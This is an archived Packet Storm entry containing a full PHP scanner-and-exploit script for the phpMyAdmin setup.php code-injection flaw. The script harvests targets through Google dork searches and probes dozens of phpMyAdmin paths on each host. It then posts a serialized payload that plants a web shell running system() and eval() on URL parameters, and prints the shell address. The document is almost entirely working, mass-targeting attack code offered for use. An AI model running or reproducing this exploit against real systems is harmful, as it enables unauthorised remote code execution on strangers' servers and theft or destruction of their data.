pmaPWN phpMyAdmin Code Injection Scanner

2009-06-23T00:00:00
ID PACKETSTORM:78566
Type packetstorm
Reporter Hacking Expose!
Modified 2009-06-23T00:00:00

Description

                                        
                                            `<?php  
  
$list = array(  
'/phpmyadmin/',  
'/phpMyAdmin/',   
'/PMA/',  
'/pma/',   
'/admin/',   
'/dbadmin/',   
'/mysql/',   
'/myadmin/',   
'/phpmyadmin2/',   
'/phpMyAdmin2/',   
'/phpMyAdmin-2/',   
'/php-my-admin/',   
'/phpMyAdmin-2.2.3/',   
'/phpMyAdmin-2.2.6/',   
'/phpMyAdmin-2.5.1/',   
'/phpMyAdmin-2.5.4/',   
'/phpMyAdmin-2.5.5-rc1/',   
'/phpMyAdmin-2.5.5-rc2/',   
'/phpMyAdmin-2.5.5/',   
'/phpMyAdmin-2.5.5-pl1/',   
'/phpMyAdmin-2.5.6-rc1/',   
'/phpMyAdmin-2.5.6-rc2/',   
'/phpMyAdmin-2.5.6/',   
'/phpMyAdmin-2.5.7/',   
'/phpMyAdmin-2.5.7-pl1/',   
'/phpMyAdmin-2.6.0-alpha/',   
'/phpMyAdmin-2.6.0-alpha2/',   
'/phpMyAdmin-2.6.0-beta1/',   
'/phpMyAdmin-2.6.0-beta2/',   
'/phpMyAdmin-2.6.0-rc1/',   
'/phpMyAdmin-2.6.0-rc2/',   
'/phpMyAdmin-2.6.0-rc3/',   
'/phpMyAdmin-2.6.0/',   
'/phpMyAdmin-2.6.0-pl1/',   
'/phpMyAdmin-2.6.0-pl2/',   
'/phpMyAdmin-2.6.0-pl3/',   
'/phpMyAdmin-2.6.1-rc1/',   
'/phpMyAdmin-2.6.1-rc2/',   
'/phpMyAdmin-2.6.1/',   
'/phpMyAdmin-2.6.1-pl1/',   
'/phpMyAdmin-2.6.1-pl2/',   
'/phpMyAdmin-2.6.1-pl3/',   
'/phpMyAdmin-2.6.2-rc1/',   
'/phpMyAdmin-2.6.2-beta1/',   
'/phpMyAdmin-2.6.2-rc1/',   
'/phpMyAdmin-2.6.2/',   
'/phpMyAdmin-2.6.2-pl1/',   
'/phpMyAdmin-2.6.3/',   
'/phpMyAdmin-2.6.3-rc1/',   
'/phpMyAdmin-2.6.3/',   
'/phpMyAdmin-2.6.3-pl1/',   
'/phpMyAdmin-2.6.4-rc1/',   
'/phpMyAdmin-2.6.4-pl1/',   
'/phpMyAdmin-2.6.4-pl2/',   
'/phpMyAdmin-2.6.4-pl3/',   
'/phpMyAdmin-2.6.4-pl4/',   
'/phpMyAdmin-2.6.4/',   
'/phpMyAdmin-2.7.0-beta1/',   
'/phpMyAdmin-2.7.0-rc1/',   
'/phpMyAdmin-2.7.0-pl1/',   
'/phpMyAdmin-2.7.0-pl2/',   
'/phpMyAdmin-2.7.0/',   
'/phpMyAdmin-2.8.0-beta1/',   
'/phpMyAdmin-2.8.0-rc1/',   
'/phpMyAdmin-2.8.0-rc2/',   
'/phpMyAdmin-2.8.0/',   
'/phpMyAdmin-2.8.0.1/',   
'/phpMyAdmin-2.8.0.2/',   
'/phpMyAdmin-2.8.0.3/',   
'/phpMyAdmin-2.8.0.4/',   
'/phpMyAdmin-2.8.1-rc1/',   
'/phpMyAdmin-2.8.1/',   
'/phpMyAdmin-2.8.2/',   
'/sqlmanager/',   
'/mysqlmanager/',   
'/p/m/a/',   
'/PMA2005/',   
'/pma2005/',   
'/phpmanager/',   
'/php-myadmin/',   
'/phpmy-admin/',   
'/webadmin/',   
'/sqlweb/',   
'/websql/',   
'/webdb/',   
'/mysqladmin/',   
'/mysql-admin/',  
);  
  
if($argc > 1) {  
print "|****************************************************************|\n";  
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";  
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";  
print " This is PHP version original http://milw0rm.com/exploits/8921\n";  
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";  
print " greetz: Hacking Expose!, HM Security, darkc0de\n";  
print "|****************************************************************|\n";  
print "\n";  
print "Usage: php $argv[0] \n";  
exit;  
}  
  
print "|****************************************************************|\n";  
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";  
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";  
print " This is PHP version original http://milw0rm.com/exploits/8921\n";  
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";  
print " greetz: Hacking Expose!, HM Security, darkc0de\n";  
print "|****************************************************************|\n";  
print "\n";  
$Handlex = FOpen("pmaPWN.log", "a+");  
FWrite($Handlex, "|****************************************************************|\n");  
FWrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");  
FWrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n");  
FWrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n");  
FWrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n");  
FWrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n");  
FWrite($Handlex, "|****************************************************************|\n\n");  
print "[-] Master, where you want to go today? \n";  
print "[-] example dork: intitle:phpMyAdmin \n";  
fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");  
$dork = trim(fgets(STDIN));  
print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";  
FWrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");  
for($i = 0; $i <= 900; $i+=100) {  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_TIMEOUT, 200);  
curl_setopt($ch, CURLOPT_HEADER, 1);  
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);  
curl_setopt($ch, CURLOPT_REFERER, "http://google.com");  
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');  
$pg = curl_exec($ch);  
curl_close($ch);  
  
if (preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $pg, $links)) { $res[] = $links[2]; }  
}  
  
foreach($res as $key) {  
foreach($key as $target) {  
$total++;  
}  
}  
print "[+] Done. $total rows return.\n";  
FWrite($Handlex, "[+] Done. $total rows return.\n");  
FClose($Handlex);  
foreach($res as $key) {  
foreach($key as $target) {  
$Handlex = FOpen("pmaPWN.log", "a+");  
$real = parse_url($target);  
$url = "http://".$real['host'];  
print "\n[-] Scanning phpMyAdmin on ".$url."\n";  
FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n");  
FClose($Handlex);  
sleep(5);  
$curlHandle = curl_multi_init();  
for ($i = 0;$i < count($list); $i++)  
$curl[$i] = addHandle($curlHandle,$url.$list[$i]);  
ExecHandle($curlHandle);  
for ($i = 0;$i < count($list); $i++)  
{   
$text[$i] = curl_multi_getcontent ($curl[$i]);  
//echo $url.$list[$i]."\n";  
$Handlex = FOpen("pmaPWN.log", "a+");  
if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {  
print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]";  
print "\n[+] Testing vulnerable, wait sec..\n";  
FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]");  
FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");  
if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {  
print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n";  
FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n");  
}  
FClose($Handlex);  
exploit_site($url.$list[$i]);  
}  
}  
for ($i = 0;$i < count($list); $i++)//remove the handles  
curl_multi_remove_handle($curlHandle,$curl[$i]);  
curl_multi_close($curlHandle);  
sleep(5);  
}  
}  
  
function addHandle(&$curlHandle,$url)  
{  
$cURL = curl_init();  
curl_setopt($cURL, CURLOPT_URL, $url);  
curl_setopt($cURL, CURLOPT_HEADER, 0);  
curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($cURL, CURLOPT_TIMEOUT, 10);  
curl_multi_add_handle($curlHandle,$cURL);  
return $cURL;  
}  
//execute the handle until the flag passed  
// to function is greater then 0  
function ExecHandle(&$curlHandle)  
{  
$flag=null;  
do {  
//fetch pages in parallel  
curl_multi_exec($curlHandle,$flag);  
} while ($flag > 0);  
}  
  
function exploit_site($url) {  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($ch, CURLOPT_HEADER, 1);  
curl_setopt($ch, CURLOPT_TIMEOUT, 200);  
curl_setopt($ch, CURLOPT_URL, $url."scripts/setup.php");  
$result = curl_exec($ch);  
curl_close($ch);  
$ch2 = curl_init();  
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($ch2, CURLOPT_HEADER, 1);  
curl_setopt($ch2, CURLOPT_TIMEOUT, 200);  
curl_setopt($ch2, CURLOPT_URL, $url."config/config.inc.php");  
$result2 = curl_exec($ch2);  
curl_close($ch2);  
//print $url;  
if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {  
print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";  
print "\n[+] Exploiting, wait sec..\n";  
$Handlex = FOpen("pmaPWN.log", "a+");  
FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");  
FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");  
FClose($Handlex);  
exploit($url);  
}  
else {  
$Handlex = FOpen("pmaPWN.log", "a+");  
print "\n[-] Shit! no luck.. not vulnerable\n";  
FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");  
FClose($Handlex);  
}  
}  
  
function exploit($w00t) {  
$Handlex = FOpen("pmaPWN.log", "a+");  
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox   
//first get cookie + token   
$curl = curl_init();   
curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php"); //URL   
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);  
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);   
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);  
curl_setopt($curl, CURLOPT_TIMEOUT, 200);   
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);   
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);   
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string   
curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");   
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");   
$result = curl_exec($curl);  
curl_close($curl);  
if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches));  
  
$token = $matches[1][1];  
if ($token != '') {  
print "\n[!] w00t! w00t! Got token = " . $matches[1][1];  
FWrite($Handlex, "\n[!] w00t! w00t! Got token = " . $matches[1][1]);  
$payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";  
print "\n[+] Sending evil payload mwahaha.. \n";  
FWrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");  
$curl = curl_init();   
curl_setopt($curl, CURLOPT_URL, $w00t."scripts/setup.php");   
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);  
curl_setopt($curl, CURLOPT_TIMEOUT, 200);  
curl_setopt($curl, CURLOPT_USERAGENT, $useragent);   
curl_setopt($curl, CURLOPT_REFERER, $w00t);   
curl_setopt($curl, CURLOPT_POST, true);   
curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);   
curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");   
curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");   
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);   
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);   
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);   
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);   
$result = curl_exec($curl);  
curl_close($curl);  
  
print "\n[!] w00t! w00t! You should now have shell here";  
print "\n[+] ".$w00t."config/config.inc.php?c=id \n";  
print "\n[!] Saved. Dont forget to check `pmaPWN.log`\n";  
FWrite($Handlex, "\n[!] w00t! w00t! You should now have shell here");  
FWrite($Handlex, "\n[+] ".$w00t."config/config.inc.php?c=id \n");  
  
}  
else {  
print "\n[!] Shit! no luck.. not vulnerable\n";  
FWrite($Handlex, "\n[!] Shit! no luck.. not vulnerable\n");  
return false;  
}  
FClose($Handlex);  
if (file_exists('exploitcookie.txt')) { unlink('exploitcookie.txt'); }  
//exit();  
}  
  
?>  
  
  
`